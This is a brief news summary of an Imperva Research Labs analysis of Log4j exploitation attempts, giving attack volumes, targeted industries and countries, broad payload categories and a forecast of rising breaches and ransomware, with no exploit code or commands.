Log4j Analysis: Attack Patterns, Payloads And Bypass Techniques

Imperva Research Labs has released its analysis of recent Log4j related vulnerabilities including attack patterns, payloads and bypass techniques.

Key data points:

●      Imperva observed over 102M exploitation attempts since the disclosure on December 9.

●      In the first 10 days, Imperva observed almost 1.3M exploit attempts per hour. Since the peak on December 23, there has been a general decline in the number of exploit attempts.

●      The number of sites attacked peaked at 25K sites per hour.

●      Commonly targeted industries are Financial Services (29.6%), Food and Beverages (12.4%) and Computing and IT (10.4%).

●      Over 100 different types of web clients have been targeted. The most prevalent of these clients was the Go HTTP library, with over 10M requests and counting.

●      Imperva observed attacks targeting sites in over 160 different countries. The US saw the majority of exploit attempts (46.5%), but Australia is in the top 6 at 3.5%. New Zealand ranked 11th at 1.5%.

Attack Patterns: Attackers largely used a “spray and pray” approach to the exploitation of this vulnerability. Many IPs were using a common technique known as “fuzzing” to identify vulnerable Java web applications.

Payload Analysis: Imperva witnessed many different payloads used in the exploitation of Log4Shell. It has divided the payloads into five categories: Probing, Reverse shells, Malware deployments, Data exfiltration and Patching.

Future Outlook: Imperva predicts that a tidal wave of breaches will be reported in the next year stemming from this vulnerability and will impact organisations of all sizes. It predicts a sharp increase in ransomware attacks and exploitative crypto mining activity. Botnets will use this vulnerability to expand, hence the volume of application and network DDoS attacks will increase.